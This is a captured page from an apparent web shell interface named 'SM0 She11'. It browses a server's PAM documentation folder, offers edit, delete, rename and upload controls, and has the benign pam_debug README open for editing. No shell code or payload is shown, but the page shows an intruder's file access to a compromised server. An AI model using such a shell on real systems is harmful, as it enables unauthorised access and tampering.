SM0 She11
Path:
/
/
usr
/
share
/
doc
/
pam-1.1.8
/
txts
Full Path (server): /usr/share/doc/pam-1.1.8/txts
Create Fil3
Upl04d Fil3
📄 README.pam_access
[E]
[D]
[R]
📄 README.pam_chroot
[E]
[D]
[R]
📄 README.pam_console
[E]
[D]
[R]
📄 README.pam_cracklib
[E]
[D]
[R]
📄 README.pam_debug
[E]
[D]
[R]
📄 README.pam_deny
[E]
[D]
[R]
📄 README.pam_echo
[E]
[D]
[R]
📄 README.pam_env
[E]
[D]
[R]
📄 README.pam_exec
[E]
[D]
[R]
📄 README.pam_faildelay
[E]
[D]
[R]
📄 README.pam_faillock
[E]
[D]
[R]
📄 README.pam_filter
[E]
[D]
[R]
📄 README.pam_ftp
[E]
[D]
[R]
📄 README.pam_group
[E]
[D]
[R]
📄 README.pam_issue
[E]
[D]
[R]
📄 README.pam_keyinit
[E]
[D]
[R]
📄 README.pam_lastlog
[E]
[D]
[R]
📄 README.pam_limits
[E]
[D]
[R]
📄 README.pam_listfile
[E]
[D]
[R]
📄 README.pam_localuser
[E]
[D]
[R]
📄 README.pam_loginuid
[E]
[D]
[R]
📄 README.pam_mail
[E]
[D]
[R]
📄 README.pam_mkhomedir
[E]
[D]
[R]
📄 README.pam_motd
[E]
[D]
[R]
📄 README.pam_namespace
[E]
[D]
[R]
📄 README.pam_nologin
[E]
[D]
[R]
📄 README.pam_permit
[E]
[D]
[R]
📄 README.pam_postgresok
[E]
[D]
[R]
📄 README.pam_pwhistory
[E]
[D]
[R]
📄 README.pam_rhosts
[E]
[D]
[R]
📄 README.pam_rootok
[E]
[D]
[R]
📄 README.pam_securetty
[E]
[D]
[R]
📄 README.pam_selinux
[E]
[D]
[R]
📄 README.pam_sepermit
[E]
[D]
[R]
📄 README.pam_shells
[E]
[D]
[R]
📄 README.pam_stress
[E]
[D]
[R]
📄 README.pam_succeed_if
[E]
[D]
[R]
📄 README.pam_tally
[E]
[D]
[R]
📄 README.pam_tally2
[E]
[D]
[R]
📄 README.pam_time
[E]
[D]
[R]
📄 README.pam_timestamp
[E]
[D]
[R]
📄 README.pam_tty_audit
[E]
[D]
[R]
📄 README.pam_umask
[E]
[D]
[R]
📄 README.pam_unix
[E]
[D]
[R]
📄 README.pam_userdb
[E]
[D]
[R]
📄 README.pam_warn
[E]
[D]
[R]
📄 README.pam_wheel
[E]
[D]
[R]
📄 README.pam_xauth
[E]
[D]
[R]
Editing: README.pam_debug
pam_debug — PAM module to debug the PAM stack ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ DESCRIPTION The pam_debug PAM module is intended as a debugging aide for determining how the PAM stack is operating. This module returns what its module arguments tell it to return. OPTIONS auth=value The pam_sm_authenticate(3) function will return value. cred=value The pam_sm_setcred(3) function will return value. acct=value The pam_sm_acct_mgmt(3) function will return value. prechauthtok=value The pam_sm_chauthtok(3) function will return value if the PAM_PRELIM_CHECK flag is set. chauthtok=value The pam_sm_chauthtok(3) function will return value if the PAM_PRELIM_CHECK flag is not set. open_session=value The pam_sm_open_session(3) function will return value. close_session=value The pam_sm_close_session(3) function will return value. Where value can be one of: success, open_err, symbol_err, service_err, system_err, buf_err, perm_denied, auth_err, cred_insufficient, authinfo_unavail, user_unknown, maxtries, new_authtok_reqd, acct_expired, session_err, cred_unavail, cred_expired, cred_err, no_module_data, conv_err, authtok_err, authtok_recover_err, authtok_lock_busy, authtok_disable_aging, try_again, ignore, abort, authtok_expired, module_unknown, bad_item, conv_again, incomplete. EXAMPLES auth requisite pam_permit.so auth [success=2 default=ok] pam_debug.so auth=perm_denied cred=success auth [default=reset] pam_debug.so auth=success cred=perm_denied auth [success=done default=die] pam_debug.so auth optional pam_debug.so auth=perm_denied cred=perm_denied auth sufficient pam_debug.so auth=success cred=success AUTHOR pam_debug was written by Andrew G. Morgan <morgan@kernel.org>.
Save